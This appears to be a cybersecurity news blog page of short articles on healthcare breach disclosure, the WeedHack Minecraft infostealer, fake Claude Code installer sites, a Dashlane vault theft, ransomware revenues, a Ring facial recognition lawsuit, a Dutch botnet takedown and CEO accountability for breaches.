It is acknowledged that disclosures of such information may cause concern, however the trust emphasised that the compromise was a result of an external pathology supplier's systems rather than its own network infrastructure, reiterating that it is committed to supplier oversight and data protection governance. However, cybersecurity professionals have expressed criticism regarding the delay of the disclosure. 

It has been argued by Saif Abed, founding partner of the AbedGraham Group, that a two-year gap between the incident and patient notification raises serious questions regarding the accountability of all organizations involved in the attack. Furthermore, he challenged suggestions that the fragmented nature of the stolen records significantly reduces risk. In his view, modern threat actors are equipped to aggregate, analyse, and correlate disparate datasets with greater ease. 

In Abed's opinion, once healthcare data enters criminal ecosystems, they are more likely to be misused than when the original breach occurred. This leaves affected individuals with limited recourse and raises concerns as to whether systemic lessons from the Synnovis incident have been adequately addressed. Several of his concerns are echoed by those he expressed last year for a formal public inquiry into the ransomware attack, as they relate to broader concerns regarding third-party cyber risk, breach transparency, and the resilience of critical healthcare supply chains. Despite the restoration of disrupted systems and the fading of headlines, the consequences of cyberattacks often persist. 

It is critical for healthcare organizations to maintain cyber resilience in the face of complex networks of third-party providers as visibility into supply chain security, timely breach assessment, and transparent communication remain critical. As a result of the case, patients need to remain vigilant against phishing attempts and identity-based fraud, while healthcare leaders need to reinforce the importance of continuously monitoring external partners whose information is sensitive. 

This incident demonstrates that maintaining patient trust throughout the healthcare ecosystem involves much more than simply adhering to technical requirements.
Read more »
Minecraft
Cyber Attacks data security Data Stealer Discord user data leak Malicious Apps Malware attacks Minecraft

WeedHack Malware Infects Over 116,000 Minecraft Players Through Fake Mods and Cheats

 

Early this year, a large-scale digital attack named WeedHack began spreading, tricking more than 116,000 Minecraft players worldwide. Instead of harmless add-ons, what seemed like useful mods carried hidden malicious software. Often, victims found these files through deceptive video guides or altered web searches promising better performance. Behind the scenes, once installed, the malware quietly pulled usernames, passwords, and crypto wallets from infected devices. 

Though warnings have been issued, experts confirm the operation is still active - expanding its reach steadily. Over 116,000 devices now show signs of intrusion by WeedHack, according to McAfee. Daily infection rates climb between two thousand and three thousand fresh cases. The United States, Germany, India, and the United Kingdom account for most affected users. Analysis revealed a network built on over 240 harmful web links. Close to 3,820 distinct JAR files were tied directly to distribution efforts. 

YouTube dominates how users encounter these threats, alongside skewed search outcomes. Hidden inside video descriptions or comment sections, harmful links promote counterfeit Minecraft modifications. Appearances deceive - some productions include polished narration and real-looking game scenes. Their legitimacy grows when large audiences watch, boosting visibility for players seeking add-ons. Not stopping there, attackers also twist how search results appear. 

When someone looks up reliable software such as Meteor Client or Radium Client, fraudulent pages rise to the front. Because real modifications often live solely on GitHub without proper web addresses, fraudsters take advantage of that emptiness. Looking nearly identical to authentic sources, these imitation platforms blur the line between secure and risky picks. 

Surprisingly, McAfee spotted a harmful website showing alerts about counterfeit Skytils downloads - yet it also included links to authentic GitHub and Discord sources. Even though the layout seemed reliable, visitors were handed corrupted files without their knowledge. Users ended up running malicious software, misled by the site’s convincing appearance. Unlike most infostealers, WeedHack runs in plain sight - offering its tools via a malware-for-hire model. 

Its visible control panel allows access to compromised systems. Data taken from victims appears there, clear and sorted. From that interface, new harmful setup files can be built, targeting Minecraft builds numbered 1.21.0 up to 1.21.10. Stolen details include Minecraft session tokens, saved browser passwords, and active cookies. Access extends to Discord, Steam, Telegram logins without consent. 

Cryptocurrency wallets get targeted too - data pulled silently. Screenshots captured behind the user's back round out basic features. Priced at five dollars monthly or twenty-five once, enhanced tools unlock next. Remote desktop viewing arrives with payment. Webcam operation follows closely after. Keystrokes recorded continuously come included. Control over a victim’s command line appears in paid tier. Managing files remotely completes the package. 

Over eight hundred members are part of WeedHack’s Telegram community, studies indicate. Though some seem underage, a number act through its online interface to target others or access personal data. Most security specialists suggest grabbing mods solely from verified platforms, checking URLs thoroughly - while skipping any JARs sitting on shady domains. When it comes to add-ons with fewer dangers, Minecraft’s built-in marketplace tends to be the safest path available.
Read more »
Technology
AI Claude Crypto Data Malware Attack Technology

Hackers Exploit Fake Claude Code Installers and Install Malware


Developers looking into Claude Code deployment instructions could be lured into an advanced malware campaign that hides itself as a genuine AI tooling documentation. 

Fake Claude code exploit

Experts found a few fake Claude Code and developer platform websites built to steal credentials, cryptocurrency, and API keys.

According to Straiker researchers, “the attack chain runs on the same unchecked trust that makes AI developer tools so easy to adopt.  “You copy a command. You paste it in your terminal. By then, it’s already too late,” said Straiker researchers in their analysis of the campaign. 

Highlights of the fake Claude code campaign 

1. Experts found over 88 fake domains mimicking Claude Code and other developer sites. The campaign utilises SEO infection and Google ads to deploy malicious install web pages over genuine documentation.

2. Threat actors hide infected commands within genuine installation commands, without impacting the deployment process.

3. The malware particularly attacks AI-based assets such as cloud development credentials, API keys, and verification tokens.

About the credential theft campaign 

The campaign attacked users of famous AI and developer tools, such as Claude Code, JetBrains, Perplexity Comet, and Cline. 

As per the experts, the operation depends on over 88 domains hosted throughout genuine platforms and constantly shuffles infrastructure, letting malicious sites to immediately resurface after shutdowns. To trap targets, threat actors use redirect chains, SEO poisoning and paid Google ads that place scammed installations over genuine documentation in search results.

These websites closely impersonate genuine vendor resources and demonstrate installation commands that look genuine but include hidden separators, such as “&,” that launch malicious actions along with the expected software deployment.

In various incidents, the genuine command still runs effectively, helping hide the hack.

Delivery of malware and launch tactics

Experts found various delivery techniques, such as rundll32.exe loading infected DLLs, Base64-encoded commands, mshta.exe abuse, JavaScript-based payloads, and GitHub-hosted scripts. 

By such techniques, hackers improve their potential to escape convention detection tools. Contrary to infostealers, the campaign pick on AI assets like authentication tokens, API Key, and cloud development credentials from tools such as Continue[.]dev, Cline. 

After execution, the malware uses a multi-level malicious chain that features encoded C2 communications, anti-analysis capabilities, fileless execution tactics, and credential theft functions.

Experts found the primary payload as ACRStealer, a malware family that steals information and has developed to include sophisticated encryption and escape tactics. Experts also identified a cryptocurrency clipboard hacker that rediverts transactions by replacing copied wallet addresses.

Read more »
Password Vault
Brute-force attack Cyber Attacks Dashlane Data Leak Password Vault

Hackers Steal Encrypted Password Vaults in Dashlane Attack

 

Dashlane’s June 2026 breach is a reminder that even password managers can become targets when attackers focus on account access rather than the encrypted vault itself. In this case, hackers used brute-force attacks against Dashlane’s two-factor authentication flow, gained access to a small number of customer accounts, and downloaded encrypted password vaults. 

According to Dashlane’s disclosure, the attackers targeted the device-registration process, which lets a new phone or computer be added to an account after verification. Dashlane said the campaign affected about 20 customer accounts and resulted in at least a dozen encrypted vaults being copied, while the company’s own infrastructure was not compromised. 

The good news is that the stolen vaults are still encrypted and cannot be opened without each user’s master password. Dashlane’s zero-knowledge design means it does not store master passwords in plaintext, so the immediate risk depends heavily on how strong and unique the user’s master password is. That said, the incident still matters because an encrypted vault can be dangerous if the master password is weak, reused, or already exposed elsewhere. Security researchers also noted the broader lesson: once attackers have a copy of the vault, they can attempt offline cracking without triggering more defenses on the service side. 

For users, the safest response is to change the master password to a long, unique passphrase, review recently registered devices, and reset any sensitive accounts stored in the vault, starting with email, banking, and identity services. It is also wise to use phishing-resistant 2FA such as a hardware security key where possible, and watch for suspicious password-reset emails for the next few weeks.
Read more »
rapid7
Cyber Crime Digital Fraud Extortion FBI FTSE IABs ransomware rapid7

Ransomware Revenues Climb as Criminal Networks Expand and Adapt like unwanted vines

 




Ransomware operators continue to generate substantial profits, with new research from Rapid7 indicating that several cybercrime groups are recording revenue growth that outpaces many publicly traded businesses.

According to the cybersecurity firm's analysis, ransomware groups collectively received an estimated $529.2 million during the first quarter of 2026. That figure represents a 39% increase compared with the same period a year earlier. Rapid7 noted that none of the companies within the FTSE 350 index reported year-over-year revenue growth exceeding 30% during that quarter, placing ransomware operators among the fastest-growing entities examined in the study.

Several well-established ransomware operations appear to be benefiting from this trend. Rapid7 estimates that the Qilin ransomware group generated approximately $193 million between July 2025 and March 2026. During the same period, the Gentleman group is estimated to have collected roughly $52 million in ransom payments.

Rapid7 researchers argue that modern ransomware operations bear little resemblance to the stereotype of small groups of hackers working independently. Instead, many function through interconnected networks of specialists who focus on specific stages of an attack. Some actors gain access to victim networks, others develop malware, while separate teams handle extortion demands and payment negotiations.

A major factor behind this growth is the emergence of Initial Access Brokers, or IABs. These actors specialize in obtaining access to corporate networks and then selling that access to other criminals. As a result, launching a ransomware attack no longer requires extensive technical expertise. Access to compromised systems, attack tools, and even managed cybercrime services can now be purchased through underground marketplaces.

Researchers say this division of labor has created a more structured criminal economy. Different groups contribute individual services, allowing ransomware campaigns to operate through networks that resemble commercial supply chains rather than isolated criminal crews.

The study also highlights the resilience of these operations. Infrastructure used by ransomware groups, including servers, data leak platforms, and victim negotiation portals, can often be restored quickly after disruptions. Law enforcement agencies, meanwhile, frequently require lengthy investigations and international coordination before conducting enforcement actions. This difference in speed allows many criminal networks to continue operating even when portions of their infrastructure are removed.

Rapid7 CTO EMEA Thom Langford said ransomware groups have demonstrated an ability to continue generating revenue despite disruptions because their operations are designed to function even when individual components are taken offline. In many cases, the removal of a single server or criminal group does not significantly affect the broader ecosystem supporting ransomware activity.

The findings come amid continued financial losses linked to cybercrime. According to the FBI's Internet Crime Complaint Center, organizations and individuals reported more than $16 billion in cybercrime losses during 2024, reflecting the growing economic impact of digital fraud, extortion, and network intrusions.

To reduce ransomware risk, Rapid7 recommends that organizations continuously review their exposed systems and identify weaknesses that could provide attackers with an entry point. Particular attention should be given to misconfigured services, overlooked assets, and internet-facing systems, which are frequently targeted by Initial Access Brokers seeking access to corporate environments.

The company also advises security teams to make greater use of threat intelligence to understand how attackers operate, including the infrastructure, tools, and access methods commonly used during intrusions. Researchers further recommend strengthening identity security through tighter access controls, least-privilege policies, and monitoring for signs that employee credentials have been stolen, resold, or abused.

According to Rapid7, disrupting ransomware attacks before attackers establish access remains one of the most effective defensive strategies. By identifying weaknesses early and restricting opportunities for credential theft, organizations may be able to prevent ransomware incidents before they progress to the extortion stage.

Read more »
Technology for Data Protection
AI Surveillance Amazon Ring Biometric Data Collection biometric privacy Consumer Privacy Rights Facial Recognition Privacy Smart Doorbell Security Technology for Data Protection

Amazon Faces Lawsuit Over Ring Facial Recognition Practices


 

Face recognition capabilities are increasingly integrated into consumer surveillance platforms, prompting increased legal scrutiny over Amazon's Ring division's handling of biometric information. Newly filed lawsuits allege that Ring's optional "Familiar Faces" feature captures, processes, and stores facial images without obtaining consent from each individual who may have their likeness recorded. 

Privacy compliance, biometric data governance, and the legal boundaries of AI-driven identification technologies are raised as a result of this lawsuit. In the complaint, which has been filed by a Virginia resident seeking class-action status and substantial damages, one of the most widely used smart doorbell ecosystems is placed at the center of a escalating debate concerning how companies balance convenience with security and data protection. 

Charles Sigwalt, who initiated the proposed class-action lawsuit in Seattle, is at the center of the legal challenge. As part of Ring's "Familiar Faces" technology, individuals within the range of compatible doorbell cameras are scanned and classified through artificial intelligence using artificial intelligence. Sigwalt claims that the feature generates and retains an unique template of the individual's face that may be used in future encounters to identify the same individual. 

Whereas Sigwalt received no notice that his biometric information was being captured or processed during his visits to friends and relatives who used Ring devices, he claims this process occurred while he was visiting those homes. Furthermore, the lawsuit alleges that the company continues to retain such data, as well as asserting that the individuals recorded by the system did not provide consent to such collection. 

Although Amazon did not respond to the allegations, this case highlights the technical operation of Ring's "Familiar Faces" feature that was introduced in September 2025 as an optional tool to enhance visitor notifications. 

By replacing generic alerts with personalized ones, this system enables cameras to recognize recurring visitors over time and send notifications based on their names instead of the usual motion or presence alerts. However Ring claims that the feature can be enabled or disabled by the user at any time, the lawsuit raises broader questions regarding how consent mechanisms adequately address biometric data of individuals who do not own the device, but may still be subjected to facial recognition analysis despite not being device owners. 

Additionally, the complaint asserts that the collection of facial recognition data extends beyond Ring device owners and may negatively affect individuals who walk through cameras monitored entryways without their knowledge or consent. 

In the filing, it is stated that millions of people may have been able to capture their facial images by simply appearing within the viewing area of Ring-equipped properties, raising questions regarding the extent of biometric data collection in residential surveillance settings. Amazon declined to comment on the litigation, however the case adds to a growing list of privacy challenges for Ring since Amazon acquired the smart security company for $1 billion in 2018. 

Ring also faced criticism months ago over its neighborhood camera network feature, which was promoted during the Super Bowl to help users locate missing pets. There has been some controversy surrounding this initiative, since privacy advocates and some users have warned that the expansion of interconnected camera coverage could result in a broader surveillance of public spaces and residential communities than the initiative's stated objective. 

Both controversies emphasize the increased scrutiny that has been focused on the deployment of networked surveillance and the handling of biometric information on a large scale by regulators and the public. Increasingly, consumer security products are providing features such as biometric recognition and artificial intelligence-driven surveillance. 

The legal challenge filed against Ring demonstrates the growing tension between the advancement of technology and the protection of individual privacy. In this case, the outcome could affect the development of facial recognition systems, biometric data management, and the process by which organizations obtain meaningful consent from individuals who are likely to be captured by connected devices. 

As intelligent surveillance technologies continue to evolve, transparency, data governance, and privacy-by-design principles remain essential safeguards for consumers and corporations alike.
Read more »
residential proxy network
Botnet attack Cyber Security DDOS Attacks Dutch Police malware infection residential proxy network

Dutch Authorities Dismantle Massive Botnet Network Linked to 17 Million Compromised Devices

 

Dutch authorities have shut down what is believed to be one of the largest botnet operations ever uncovered, disrupting a cybercrime network that compromised more than 17 million internet-connected devices globally. The affected devices reportedly included computers, smartphones, tablets, security cameras, and other connected hardware that were unknowingly used to facilitate large-scale cyberattacks.

According to Dutch investigators, approximately 200 servers located in the Netherlands were seized as part of the operation. These servers allegedly formed the backbone of a sophisticated botnet infrastructure that transformed infected devices into components of a residential proxy network.

A botnet is a collection of compromised devices that cybercriminals can remotely control after infecting them with malware. Such networks are commonly used to launch Distributed Denial of Service (DDoS) attacks, distribute phishing campaigns, send spam, commit fraud, and conceal the origins of malicious online activities.

Dutch media outlet NL Times reported that cybercriminals targeted devices with weak security protections, converting them into nodes within a residential proxy service. Once infected, the devices were used to redirect internet traffic and allegedly help "launch large-scale cyberattacks" without the owners' knowledge. Authorities confirmed that the network has now been taken offline.

The investigation began after a cybersecurity researcher working with the National Cyber Security Centre (NCSC) identified suspicious activity linked to the botnet. The NCSC, which operates under the Netherlands' Ministry of Justice and Security, subsequently partnered with Dutch law enforcement agencies to investigate the case. Their efforts led to the identification and seizure of the servers supporting the operation.

While authorities have not disclosed the exact method used to infect more than 17 million devices, cybersecurity experts note that botnets are commonly spread through malicious applications, software vulnerabilities, phishing campaigns, and brute-force attacks.

The dismantled network has reportedly been linked by NL Times to Asocks, a residential proxy service that has previously faced scrutiny over alleged connections to botnet-related activities. However, Dutch police have not officially confirmed any association.

In 2024, cybersecurity company HUMAN reported that a botnet known as Proxylib had infected nearly 190,000 devices and integrated them into Asocks' proxy network. Researchers connected that operation to a discontinued VPN service and at least 28 Android applications.

Residential proxy services route internet traffic through the IP addresses of ordinary users, making online activity appear to originate from legitimate residential locations. While such services can have lawful uses, including bypassing geographic restrictions, experts warn that they are increasingly being exploited by cybercriminals.

Following the takedown, the NCSC updated its guidance on residential proxy networks and highlighted the risks they pose. In an updated statement, the agency said the enforcement action "demonstrates" how residential proxies pose "a threat to national and international cybersecurity."

The agency further warned that the technique is "being deployed more and more frequently in digital attacks," enabling activities such as DDoS attacks, phishing campaigns, credential theft, brute-force attacks, malware distribution, and SMS pumping.

The operation reflects a broader international effort to combat cybercrime infrastructure. In March, authorities from Germany, Canada, and the United States coordinated actions against two major botnets known as "Aisuru" and "Kimwolf," which were allegedly responsible for large-scale DDoS attacks. U.S. authorities reported that those networks had compromised more than three million devices.

Earlier this year, Google disrupted the IPIDEA proxy network, whose development kits were reportedly used by the Kimwolf botnet. Separately, the Netherlands' Fiscal Information and Investigation Service (FIOD) seized more than 800 servers connected to an illegal hosting platform allegedly used for botnet and malware-related activities.

Cybersecurity experts continue to advise users to strengthen their digital defenses by creating strong passwords, regularly updating software, monitoring network activity, enabling WPA2 or WPA3 Wi-Fi security protocols, and avoiding downloads from unverified sources. Users are also encouraged to carefully review application permissions and terms of service to ensure their devices are not unknowingly enrolled in proxy networks. Traditional antivirus protection remains an important layer of defense against evolving cyber threats.

Read more »
leadership
CEO accountability cyberattack responsibility cybersecurity breaches Data Breach leadership

Debate Intensifies Over CEO Accountability in Cybersecurity Breaches

 

A growing debate is emerging around whether chief executives should be held directly accountable when companies suffer cyberattacks. Some experts argue that CEOs must face severe consequences, including automatic dismissal after a major breach, while others warn that such a policy could create dangerous incentives and worsen crisis management.

One viewpoint insists that cybersecurity failures are ultimately leadership failures. Security executives, according to this argument, often act as “bullet fodder” despite lacking control over budgets, risk appetite, or enforcement across business units. They can identify risks and recommend action, but final decisions rest with company leadership.

“CEOs should absolutely be held accountable for a cyberattack. In fact, I would go even further: when there’s a breach, defined as a system being compromised or data being stolen, the CEO should be automatically fired as a result.”

Supporters of stricter accountability say catastrophic breaches can damage customers, employees, supply chains, and the broader business ecosystem. When leadership underfunds security or ignores warnings, they argue, that is a deliberate business choice. They compare major cyber incidents to executive negligence in other corporate functions and suggest boards should establish predefined thresholds for breaches that automatically trigger CEO removal.

Another key point in this camp is incentives. Cyber resilience and risk reduction, advocates say, should be tied directly to executive compensation and employee bonuses so that cybersecurity becomes a company-wide priority rather than a secondary concern.

“When failure carries no personal cost for leadership, accountability shifts downward. Personal accountability at CEO level restores seriousness to cyber risk and aligns decision-making with real-world consequences for all stakeholders.”

However, critics argue that making CEOs personally liable for every breach could backfire. Cyberattacks vary widely in method and speed, and breaches can spread through networks within minutes. During the immediate aftermath, companies need rapid containment and transparent communication with affected parties.

Opponents warn that harsh personal penalties could encourage executives to conceal incidents or delay disclosure out of fear for their own careers. They also point out that cybercriminals might exploit this pressure by attempting to extort CEOs personally in exchange for silence about an attack.

“The focus should be on identifying and penalising the perpetrators, not the victims.”

The recent cyberattack on Marks & Spencer has added fuel to the discussion. The incident disrupted the retailer’s online operations for 46 days, and the company’s annual report revealed that CEO Stuart Machin took a 40% reduction in pay after the bonus scheme was scrapped because of the attack.
Read more »
Subscribe to: Posts (Atom)